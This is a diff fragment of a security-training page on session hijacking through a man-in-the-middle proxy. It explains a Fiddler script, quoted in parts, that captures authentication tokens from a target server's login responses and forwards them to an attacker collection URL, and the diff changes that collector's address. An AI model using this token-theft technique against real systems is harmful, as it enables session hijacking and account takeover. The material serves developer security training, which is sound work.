robinsillem/SecurityTraining/Attacks/Session hijacking via MITM.md

  ```

 The script above will first intercept any successful authentication response from the targeted server (`oSession.HostnameIs("10.10.10.10") && oSession.uriContains("/api/sessions") && oSession.responseCode == 200`).
-When this happens, the authentication token will be collected from the response (`System.Text.Encoding.UTF8.GetString(oSession.responseBodyBytes)`) and sent to the attacker website in charge of collection stolen information (`Handlers.HTTPGet("http://10.10.10.11/api/logs/add",queryString)`).
+When this happens, the authentication token will be collected from the response (`System.Text.Encoding.UTF8.GetString(oSession.responseBodyBytes)`) and sent to the attacker website in charge of collecting stolen information (`Handlers.HTTPGet("http://10.10.10.30/api/logs/add",queryString)`).

-Now put this together to customise Fiddler so it complains if any session ID tokens/cookies are sent over HTTP for either of the samples - you should now have a detailed understanding of exactly what you want to catch on each sample app.
-This will be the basis of our testing for this module - you will just run the apps with Fiddler capturing HTTP requests and flagging the bad ones.

-*Test-specific* There are some rules I cooked up earlier in the resources folder - these are specific to these sample apps, they'll need modifying for your real-world apps. @Devs, write your own ;-)

 Exercise 4: See how the samples behave with HTTPS